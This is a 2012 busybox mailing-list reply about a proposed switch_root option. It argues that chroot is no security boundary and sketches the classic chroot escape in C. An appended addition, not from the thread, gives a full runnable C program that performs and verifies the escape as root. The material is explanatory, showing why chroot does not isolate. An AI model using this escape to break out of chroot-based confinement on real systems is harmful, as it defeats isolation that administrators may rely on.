On 05/02/2012 11:21 AM, Sergey Naumov wrote:
> I have implemented a patch which adds -m option to switch_root which
> prevents it from making a mount-move.

If the mount move isn't needed, it shouldn't do it. If it is needed, it
should do it. Providing a knob to control something 99.9% of the
userbase have no idea even _exists_ seems less than ideal.

> I haven't noticed any changes in behavior of my system, but now I can
> do all necessary mounts in initramfs,

So you haven't noticed any changes in behavior, except for this change
in behavior...

I'm still unclear on what you're trying to do.

> then call rsbac_init as last but one statement (after that any mount
> call for root device would fail) and then call
> switch_root -m /newroot /sbin/init. So I have a chroot behavior, but
> also can benefit from switch_root's cleaning of initramfs content.

So you do something funky to make your filesystem immutable, and this
prevents a mount --move from working on it.

Which is really weird because mount --move is a vfs option, not a
filesystem option.

>> It sounds like you're saying you _don't_ want to let people do "mount
>> --remount,rw /", that with the current switch_root you can and with your
>> proposed modification you can't?
> 
> Without -m option I would be reluctant to defer rsbac initialization
> to later boot stages and it is not so good in terms of security, I
> think.

Oh dear, "security".

You're aware you can break out of a simple chroot and get back into the
initramfs, right?

Dunno why you'd want to, but in C it's something like:
  mkdir("sub", 0700);                    /* a directory under the current root */
  chroot("sub");                         /* root is now *below* the cwd */
  chdir("../../../../../../../../..");   /* nothing stops ".." any more */
  chroot(".");                           /* whatever we reached is root now */

Congratulations, you're in initramfs.  Because the kernel's chroot test
is for equality, not >= (which isn't a relationship dentries really
_have_ anyway), so if you move it below your current directory you can
ascend all the way to the root of the tree.

Even if you've deleted everything out of it, initramfs is still writeable
to root.

I repeat: I have no clue what you're trying to accomplish here.

Rob
-- 
GNU/Linux isn't: Linux=GPLv2, GNU=GPLv3+, they can't share code.
Either it's "mere aggregation", or a license violation.  Pick one.
_______________________________________________
busybox mailing list
[email protected]
http://lists.busybox.net/mailman/listinfo/busybox
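
The chroot() escape sketched in the message above, written out as a complete C program that jails itself, escapes, and then checks that "/" is the original root again by comparing its device and inode. This is an added example, not code from the thread or from busybox. It assumes a writable /tmp (the jail directory name is constructed with mkdtemp) and CAP_SYS_CHROOT, i.e. it must run as root; without that privilege chroot() fails with EPERM and the program reports "skipped" instead of failing. The helper names chroot_escape_demo and chroot_escape_demo_ok are this example's own.

```c
/* Added example (not from the mailing-list thread): the chroot() escape
 * Rob sketches, run end to end and verified. Assumes a writable /tmp and
 * CAP_SYS_CHROOT (i.e. root); without the capability it reports "skipped".
 *
 * chroot_escape_demo() returns:
 *   0  jailed, escaped, and "/" is the original root again
 *   1  escaped but "/" is not the original root (should not happen)
 *   2  skipped: chroot() refused with EPERM (not root / no CAP_SYS_CHROOT)
 *  -1  setup or cleanup problem unrelated to the escape itself
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

static int same_inode(const struct stat *a, const struct stat *b)
{
    return a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

int chroot_escape_demo(void)
{
    char jail[] = "/tmp/jail.XXXXXX";          /* constructed jail path */
    char sub[sizeof jail + 8];
    char cwd[4096];
    struct stat real_root, jailed_root, after_escape;
    int rc = -1;

    if (stat("/", &real_root) != 0 || getcwd(cwd, sizeof cwd) == NULL)
        return -1;
    if (mkdtemp(jail) == NULL)
        return -1;
    snprintf(sub, sizeof sub, "%s/sub", jail);

    /* 1. Jail ourselves the naive way: chroot() followed by chdir("/"). */
    if (chroot(jail) != 0) {
        rc = (errno == EPERM) ? 2 : -1;
        rmdir(jail);
        return rc;
    }
    if (chdir("/") != 0 || stat("/", &jailed_root) != 0)
        goto done;
    if (same_inode(&real_root, &jailed_root))   /* jail must differ from real root */
        goto done;

    /* 2. The escape. After chroot("sub") the root dentry sits *below* our
     *    cwd, so the kernel's "is this dentry the root?" equality check never
     *    fires while we walk ".." upward; the walk only stops at the real root
     *    of the mount namespace. Surplus ".." components are harmless there. */
    if (mkdir("sub", 0700) != 0) goto done;
    if (chroot("sub") != 0) goto done;
    if (chdir("../../../../../../../../../../../../../../../../..") != 0) goto done;
    if (chroot(".") != 0) goto done;

    /* 3. Verify: "/" must be the same device/inode as before we were jailed. */
    if (stat("/", &after_escape) != 0) goto done;
    rc = same_inode(&real_root, &after_escape) ? 0 : 1;

done:
    /* If the escape failed we are still jailed and these absolute paths will
     * not resolve; nothing more can be done from inside. On success they do. */
    rmdir(sub);
    rmdir(jail);
    if (chdir(cwd) != 0 && rc == 0) rc = -1;
    return rc;
}

/* 1 when the demo either escaped successfully or was skipped for lack of privilege. */
int chroot_escape_demo_ok(void)
{
    int rc = chroot_escape_demo();
    return rc == 0 || rc == 2;
}

int main(void)
{
    int rc = chroot_escape_demo();
    printf("chroot_escape_demo: rc=%d (%s)\n", rc,
           rc == 0 ? "escaped back to the real root" :
           rc == 2 ? "skipped, need CAP_SYS_CHROOT" : "failed");
    return (rc == 0 || rc == 2) ? 0 : 1;
}
```

Build with `cc -o chroot_escape chroot_escape.c` and run it as root; rc=0 means the process was jailed under /tmp and walked back out. The same sequence, started from inside a switch_root'ed or chroot'ed init, lands in the initramfs, which is the point of the message: a plain chroot is not a security boundary, and whatever is mounted or writeable outside it stays reachable to root.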
